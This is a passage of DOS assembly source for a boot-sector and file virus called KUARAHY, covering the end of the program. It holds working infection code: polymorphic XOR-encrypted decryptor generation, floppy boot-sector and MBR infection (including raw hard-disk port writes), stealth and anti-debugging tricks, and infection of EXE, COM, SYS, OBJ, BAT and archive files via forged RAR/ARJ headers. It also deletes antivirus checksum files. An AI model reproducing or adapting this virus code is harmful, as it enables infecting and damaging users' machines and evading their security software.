Rotar mov ax,0431h stosw jmp Oima SUBEAR: cmp ax,200 ja ADDEAR mov cl,2 ; SUB mov ax,02c81h stosw mov di,offset Rotar mov ax,0401h stosw jmp Oima ADDEAR: mov cl,3 ; ADD mov ax,00481h stosw mov di,offset Rotar mov ax,0429h stosw Oima: xor ch,ch ; Choose new pointer mov di,offset Pointer-1 push cx mov cx,255 call Get_RND pop cx cmp al,80 ja UsarSI ; BX mov al,0bbh stosb mov di,offset ClaveB+2 mov ax,04343h stosw mov di,offset ClaveB-1 mov si,offset TablaBX-1 add si,cx movsb jmp Oikoma UsarSI: cmp al,160 ja UsarDI ; SI mov al,0beh stosb mov di,offset ClaveB+2 mov ax,04646h stosw mov di,offset ClaveB-1 mov si,offset TablaSI-1 
add si,cx movsb jmp Oikoma UsarDI: mov al,0bfh ; DI stosb mov di,offset ClaveB+2 mov ax,04747h stosw mov di,offset ClaveB-1 mov si,offset TablaDI-1 add si,cx movsb Oikoma: xor si,si ; Write the new 1§ decryptor over mov di,offset CopiaVirus ; the buffer mov cx,offset Encriptado rep movsb mov si,offset CopiaVirus add si,offset Encriptado mov ax,word ptr [ClaveB] mov cx,0d8h Rotar: xor word ptr [si],ax ; Encrypt first part (BS/MBR one) inc si inc si loop Rotar cmp byte ptr cs:[QueEs],'b' ; Flag checking jne Voltemos mov si,offset CopiaVirus add si,offset Pointer ; Fix the pointer for BS/MBR copy mov word ptr [si],offset Encriptado+07c00h Voltemos: ret Checar_Ext: mov si,offset Cabecera or word ptr [si],02020h ; Lowercase extension or word ptr [si+2],020h mov di,offset Targets ; And check if it matchs with one Otro: mov si,offset Cabecera ; of the 8 we can manage cmp di,offset Targets+24 ja Ninguno mov cx,3 rep cmpsb jnz Otro cmp di,offset Targets+3 je Exe cmp di, offset Targets+6 je Com cmp di,offset Targets+9 je Sys cmp di,offset Targets+12 je Obj cmp di,offset Targets+15 je Bat cmp di,offset Targets+18 je Ovl cmp di,offset Targets+21 je Arj cmp di,offset Targets+24 je Rar Ninguno:mov byte ptr [QueEs],'X' ; :( stc ret Exe: mov al,'E' ; EXE jmp EternoRetorno Com: mov al,'C' ; COM jmp EternoRetorno Sys: mov al,'S' ; SYS jmp EternoRetorno Obj: mov al,'O' ; OBJ jmp EternoRetorno Bat: mov al,'B' ; BAT jmp EternoRetorno Ovl: mov al,'E' ; OVL jmp EternoRetorno Arj: mov al,'A' ; ARJ jmp EternoRetorno Rar: mov al,'R' ; RAR EternoRetorno: mov byte ptr [QueEs],al mov ds,bx clc ret Lectura:mov ah,3fh ; Read OBJ field descriptor mov cx,3 mov dx,offset Buffer int 21h mov dx,word ptr ds:[Buffer+1] mov al,byte ptr ds:[Buffer] ret CRC32: push bx cx si di call Generar_Tabla ; Generate CRC 32 table mov dx,0ffffh mov ax,0ffffh CRC32loop: sub bx,bx mov bl,byte ptr [si] inc si xor bl,al shl bx,1 shl bx,1 mov al,ah mov ah,dl mov dl,dh xor dh,dh xor ax,word ptr [bx+offset ParaCRC] xor 
dx,word ptr [bx+offset ParaCRC+2] dec cx jnz CRC32loop xor dx,0ffffh xor ax,0ffffh pop di si cx bx ret Chequeo:mov ax,013cdh ; Yes, we are TSR mov bx,cs iret Generar_Tabla: ; Generates the CRC 32 table push ax cx dx di mov di,offset ParaCRC ; Buffer where the table will be xor cx,cx ; created Carrusell: xor dx,dx xor ax,ax mov al,cl push cx mov cx,8 Calculo:clc rcr dx,1 rcr ax,1 jnc NoXORear xor dx,0edb8h xor ax,8320h NoXORear: loop Calculo mov word ptr [di],ax mov word ptr [di+2],dx add di,4 pop cx inc cx cmp cx,100h jne Carrusell pop di dx cx ax ret Kill_Tunnel: push ds si ax bx pushf pop ax and ah,11111110b ; Turn off the trap flag push ax popf sub ax,ax mov ds,ax mov bx,4 lds si,[bx] mov byte ptr [si],0cfh ; Put an IRET in the INT 1 handler pop bx ax si ds ret Infectar: ; Floppy infection routine pushf call dword ptr cs:[Offset_de_la_13h] jc Error_de_Lectura cmp word ptr es:[bx+offset Marca],0f7e2h je Stealth_BS ; If already infected, stealth it cmp word ptr es:[bx+13h],0b40h jne Error_de_Lectura ; FD 1.44mb? 
2880 sectors pushf push ax bx cx dx si di mov byte ptr cs:[DondeEstamos],'F' push es push ds push es pop ds push cs pop es lea si,[bx+3] ; Save BPB values of the floppy mov di,3 mov cx,3bh rep movsb pop ds pop es call Format_an_extra_track ; Create our new cylinder in A: mov ax,0301h ; Write original BS to sector 1 sub dx,dx ; Head 0 mov cx,05001h ; Track 80, sector 1 pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0301h pushf call dword ptr cs:[Offset_de_la_13h] push es push cs pop es mov byte ptr cs:[QueEs],'b' ; Modify our flag push bp ds es mov bp,020fh call Encriptor ; Give me an encrypted copy pop es ds bp mov ax,0309h ; Write the virus in the contiguos mov cx,5002h ; sectors of our track 80 mov bx,offset CopiaVirus+200h pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0309h pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0301h mov cx,0001h ; Write virus first part to BS xor dx,dx mov bx,offset CopiaVirus pushf call dword ptr cs:[Offset_de_la_13h] pop es pop di si dx cx bx ax popf Error_de_Lectura: retf 2 db 3,'Rohaih£ Paraguay!',3 ; Guaran¡ language r0x0r!!! 
Format_an_extra_track: ; The extra track kreator push ds es bx push cs cs pop ds es xor ax,ax mov ds,ax ; DS=IVT mov si,01eh*4 mov di,offset Vieja1eh ; Copy old Int 1eh address (ddpt) movsw movsw mov es,ax mov di,01eh*4 mov ax,offset FDHD35 ; Hook Int 1eh, points to our own table stosw mov ax,cs stosw push cs cs pop ds es mov di,offset Tabla ; Generation of the little table mov cx,0201h Fabricar_Tabla: mov ax,0050h ; 50h=80d, our new track stosw ; 0 is for the head 0 mov ax,cx ; CH=02, 512 bytes x sector stosw inc cl ; INC sector counter cmp cx,020Ah jbe Fabricar_Tabla xor ax,ax int 13h mov ax,050Ah ; Format 10 sectors mov bx,offset Tabla mov cx,05001h ; Track 80, from sector #1 xor dx,dx ; Head 0, drive A: int 13h xor ax,ax mov es,ax mov si,offset Vieja1eh ; Restore Int 1eh mov di,1eh*4 movsw movsw pop bx es ds ret InfectarMBR: ; MBR infector procedure push ax bx cx dx si di bp ds es push cs cs pop ds es cmp byte ptr es:[Bandera],'N' jne Adios ; Already infected in previous ocasion mov ax,0201h mov bx,offset MBRBS ; Read MBR mov cx,1 mov dx,0080h int 13h cmp word ptr [bx+offset Marca],0f7e2h jne SuckIt ; Already infected? Adios: pop es ds bp di si dx cx bx ax iret SuckIt: mov byte ptr es:[DondeEstamos],'H' mov byte ptr es:[Bandera],'Y' mov di,32 ; Check my flag call Reutilizar jmp short Adios Direct_HD_Write_Using_Ports: ; MBR infection via HD ports mov dx,01f2h ; Initial port mov cx,6 ; We will go 6 times outsb ; Send the byte to port inc dx ; Next port loop $-2 ; Repeat Esperar:in al,dx test al,8 ; Wait... 
jz Esperar mov si,bx ; DS:SI=buffer to write mov cx,256 mov dx,1f0h repe outsw ; Do it ret TablaBX db 037h,02fh,07h ; TablaSI db 034h,02ch,04h ; Tables used to mutate decryptor TablaDI db 035h,02dh,05h ; ; Disk device parameter table for our new track FDHD35 db 0dfh,2,025h,2,012h,01bh,0ffh,06ch,2,0fh,8 ; Values that we will send to HD ports ParaOuting db 1,1,0,0,0a0h,30h ; Stupid files we will delete in order to free space :) Basura1 db 'ANTI-VIR.DAT',0 Basura2 db 'CHKLIST.MS',0 Basura3 db 'CHKLIST.CPS',0 Basura4 db 'AVP.CRC',0 ; This is the parameter table for 4Bh function PSP dw 0,80h SLINEA dw 0,005ch FCB1 dw 0,006ch FCB2 dw 0 RunMe db 'C:\COMMAND.COM',0 ; OBJ ending module Finalizacion: db 08ah,07h,00h,0c1h,010h,01h,01h,00h,01h,09bh ; The OBJ record where the virus will go VirusOBJRecord: db 0a0h dw Largor+3 db 01 dw 100h ; Insane bitmapped fonts. To change default text mode fonts to a nicer one Letras db 00000000b db 00000000b db 00111000b db 01111100b db 11000110b db 11000110b db 01101100b db 11111110b ; A db 11000110b db 11000110b db 11000110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 11111000b db 01111100b db 01100110b db 01100110b db 01101110b db 11111100b ; B db 01100110b db 01100110b db 01111110b db 11111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00111000b db 01111100b db 11100110b db 01100110b db 01100010b db 01100000b ; C db 01100010b db 11100110b db 01111110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 11110000b db 00111000b db 00011100b db 01001110b db 11100110b db 01100110b ; D db 01100110b db 01100110b db 01111100b db 11111000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111000b db 11111100b db 01100110b db 01101010b db 11111000b db 01101000b ; E db 01100010b db 01100110b db 11111100b db 01111000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111100b db 11111110b db 01100010b db 01100000b db 01101000b ; F db 11111000b db 01101000b db 01100000b db 01100000b db 
11110000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111100b db 11101110b db 01100110b db 01100100b db 01100000b ; G db 11100010b db 01100110b db 01101110b db 11111110b db 01110110b db 00000010b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 01100110b db 11100111b ; H db 01111110b db 01100110b db 01100110b db 01100110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 00011000b db 00111100b db 00111100b db 00011000b db 00011000b ; I db 00011000b db 00011000b db 00111100b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 00000110b db 00001110b db 00001110b db 01000110b db 01100110b ; J db 01110110b db 01100110b db 01100110b db 01100110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100010b db 01100110b db 11100110b db 01100110b db 01110100b ; K db 01111000b db 01101100b db 11100110b db 01100110b db 00100010b db 00000000b db 00000000b db 00000000b db 00000000b db 00100000b db 01100000b db 11100000b db 01100000b db 01100000b ; L db 01100010b db 01100110b db 01101110b db 01100110b db 11111100b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000010b db 11000110b db 11101110b db 11111110b db 11010110b ; M db 11010110b db 11000110b db 11000110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000110b db 11100110b db 11110110b db 11011110b ; N db 11001110b db 11000110b db 11000110b db 11000110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 00011000b db 00111100b db 01101110b db 01100110b db 01100110b db 01100110b ; O db 01100110b db 01110110b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 11110000b db 01111100b db 01101110b db 01100110b db 01100110b db 01101110b ; P db 11111100b db 01100000b db 01100000b db 01000000b db 00000000b db 00000000b db 00000000b db 00000000b db 00110000b db 01111100b db 11000110b db 11000110b db 11000110b db 11000110b 
; Q db 11000110b db 11010110b db 01111100b db 00011000b db 00001100b db 00000000b db 00000000b db 00000000b db 11111100b db 01100110b db 01100110b db 01100110b db 01110100b db 01111000b ; R db 01101100b db 11100110b db 01100110b db 00100010b db 00000000b db 00000000b db 00000000b db 00000000b db 00111100b db 01100110b db 01100110b db 01100110b db 00110010b ; S db 00011000b db 0001100b db 00100110b db 01100110b db 10111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100100b db 01111110b db 11011011b db 10011001b db 00011000b db 00011000b ; T db 00011000b db 00011000b db 00011000b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 01100110b db 01100110b ; U db 01100110b db 01100110b db 01100110b db 01111110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100100b db 01100110b db 01100110b db 01100110b db 01100110b ; V db 01100110b db 01100110b db 01100110b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000110b db 11000110b db 11000110b db 11010110b db 11010110b ; W db 11111110b db 11111110b db 11101110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 00111100b db 00011000b db 00011000b ; X db 00011000b db 00011000b db 00111100b db 01100110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 00111100b db 00011000b db 00011000b ; Y db 00011000b db 00011000b db 00011000b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00111100b db 01100110b db 01000110b db 00001100b db 00011000b ; Z db 01111100b db 00110000b db 01100010b db 01100110b db 00111100b db 00000000b db 00000000b Buffer db 0,0,0 ; Used by the OBJ infection Entrada db 0,0,0 ; procedure Linea db ' /C ' ; This is our RAR header RARHeader: ; Hey Star0! 
RARHeaderCRC: dw 0 RARType: db 074h ; File Header RARFlags: dw 8000h RARHeadsize: dw HeaderSize RARCompressed: dd Largor ; Both are the same RAROriginal: dd Largor ; because we stored it RAROs: db 0 ; MS-DOS RARCrc32: dd 0 RARTimeDate db 0deh,045h,022h,025h ; Marked time+date RARNeedVer: db 014h RARMethod: db 030h ; Storing method of compression RARFnameSize: dw EndRARHeader-RARName RARAttrib: dd 0 RARName: db "FONT.COM" EndRARHeader: ; We will write this to the ARJ HeaderARJ: ARJSig: db 60h,0EAh ; ARJ signature ARJHeadsiz: dw 28h ; Header size ARJHSmsize: db 1Eh ; Internal header size ARJVer: db 07h ; Ver made by ARJMin: db 01h ; Minimum version to extract ARJHost: db 0h ; Host OS ARJFlags: db 10h ; Flags ARJMethod: db 0h ; Method=stored ARJFiletype: db 0h ; File type=binary ARJReserved: db 'Z' ; reserved TimeDate db 0deh,045h,022h,025h ; Marked time+date ARJCompress: dd Largor ; size compressed ARJOriginal: dd Largor ; size uncompressed ARJCrc32: dd 0 ; CRC of The file ARJEntryName: dw 0 ; Just God Knows... ARJAttribute: dw 0 ; Attribute ARJHostData: dw 0 ; Unknown Mnemonic... SecondSide: Agregar: db 'FONT.COM',0 ; FileName ARJComment: db 0 ; Comment ARJHeaderCrc: dd 0 ; Header Crc32 ARJExtended: dw 0 ; Extended Header EndSide: OMEGA: ; End of virus in the file Stratovarius dw 0 ; Best Melodic Metal Group!!! AtribsFile dw 0 Vieja24h dd 0 Victima dd 0 SFT dd 0 MBRBS db 512 dup(0) Cabecera db 45d dup(0) FileName db 128d dup(0) CopiaVirus db Largor dup(0) Vieja1eh dd 0 TABLA db 40 dup(0) ; The table will be generated here ParaCRC db 1024 dup(0) FAKEHOSTE: push cs ; Our sucked hoste :) pop ds mov ah,9 ; Print the message mov dx,offset Dreamspace int 21h mov ax,4c00h ; Turn back to DOS int 21h Dreamspace: ; Excelent Stratovarius's album! 
db 13,10,13,10,13,10,13,10 db " Now it's time for you to move on",13,10 db " Leave the shadows of your past",13,10 db " Don't let them haunt you forever",13,10,13,10 db " Hold on to your dream",13,10 db " Somewhere there's a beam of hope",13,10 db " which is guiding your way through the dark",13,10,13,10 db " Hold on to your dream - STRATOVARIUS",13,10,13,10 db " KUARAHY virus released! Your MBR is infected. Emboguesé kuarahy?",13,10,13,10,'$' END KUARAHY ; Yes, this is the end...